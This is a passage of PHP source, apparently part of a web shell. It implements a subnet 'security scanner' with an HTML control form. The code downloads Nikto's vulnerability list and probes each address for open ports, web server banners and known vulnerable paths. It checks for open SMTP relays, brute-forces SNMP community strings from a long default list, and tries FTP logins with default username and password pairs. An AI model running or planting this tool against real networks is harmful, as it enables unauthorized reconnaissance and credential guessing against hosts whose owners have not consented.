        if (!empty($_REQUEST['httpscanner'])) {
            echo "Loading webserver bug list...";
            flusheR();
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . namE();
            $dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                $file = file($buglist);
                echo "Done! scanning started.<br><br>";
            } else {
                echo "Failed!!! scanning started without webserver security testing...<br><br>";
            }
            flusheR();
        } else {
            $fr = htmlspecialchars($from);
            echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
        }
        for ($i = $f; $i <= $to; $i++) {
            $output = 0;
            $ip = "{$from}.{$i}";
            if (!empty($_REQUEST['nslookup'])) {
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "{$ip} [{$hn}]<br>";
                }
            }
            flusheR();
            if (!empty($_REQUEST['ipscanner'])) {
                $port = $_REQUEST['port'];
                if (strstr($port, ",")) {
                    $p = explode(",", $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = "";
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = "";
                        if ($ser = getservbyport($po, "tcp")) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "{$ip}) Open ports:{$open}<br>";
                    $output = 1;
                }
                flusheR();
            }
            if (!empty($_REQUEST['httpbanner'])) {
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "{$ip}) Webserver software: ";
                    if ($res == -1) {
                        echo "Unknow";
                    } else {
                        echo $res;
                    }
                    echo "<br>";
                    $output = 1;
                }
                flusheR();
            }
            if (!empty($_REQUEST['httpscanner'])) {
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    $admin = array('/admin/', '/adm/');
                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array();
                        $v = trim($v);
                        if (!$v || $v[0] == '#') {
                            continue;
                        }
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        if (strstr($page, '@CGIDIRS')) {
                            foreach ($cgi as $cg) {
                                $cqich = str_replace('@CGIDIRS', $cg, $page);
                                $url = "http://{$ip}{$cqich}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) {
                            foreach ($admin as $cg) {
                                $adminch = str_replace('@ADMINDIRS', $cg, $page);
                                $url = "http://{$ip}{$adminch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@USERS')) {
                            foreach ($users as $cg) {
                                $userch = str_replace('@USERS', $cg, $page);
                                $url = "http://{$ip}{$userch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } elseif (strstr($page, '@NUKE')) {
                            foreach ($nuke as $cg) {
                                $nukech = str_replace('@NUKE', $cg, $page);
                                $url = "http://{$ip}{$nukech}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                                }
                                flusheR();
                            }
                        } else {
                            $url = "http://{$ip}{$page}";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
                            }
                            flusheR();
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "{$ip}) SMTP relay found.<br>";
                        $output = 1;
                    }
                    flusheR();
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = "";
                    if (strstr($com, ",")) {
                        $c = explode(",", $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != "") {
                        echo "{$ip}) SNMP FOUND: {$coms}<br>";
                        $output = 1;
                    }
                    flusheR();
                }
            }
            if (!empty($_REQUEST['ftpscanner'])) {
                if (checkthisporT($ip, 21, $timeout)) {
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        $ftp = @ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (@ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>";
                            }
                        }
                        flusheR();
                    }
                }
            }
            if ($output) {
                echo "<hr size=1 noshade>";
            }
            flusheR();
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
        if (!empty($buglist)) {
            unlink($buglist);
        }
    } else {
        $chbox = extension_loaded('sockets') ? "<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">{$chbox}</td><td bgcolor=\"#808080\" align=\"right\">{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
        $host = substr($host, 0, strrpos($host, "."));
        echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH\$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
    }
}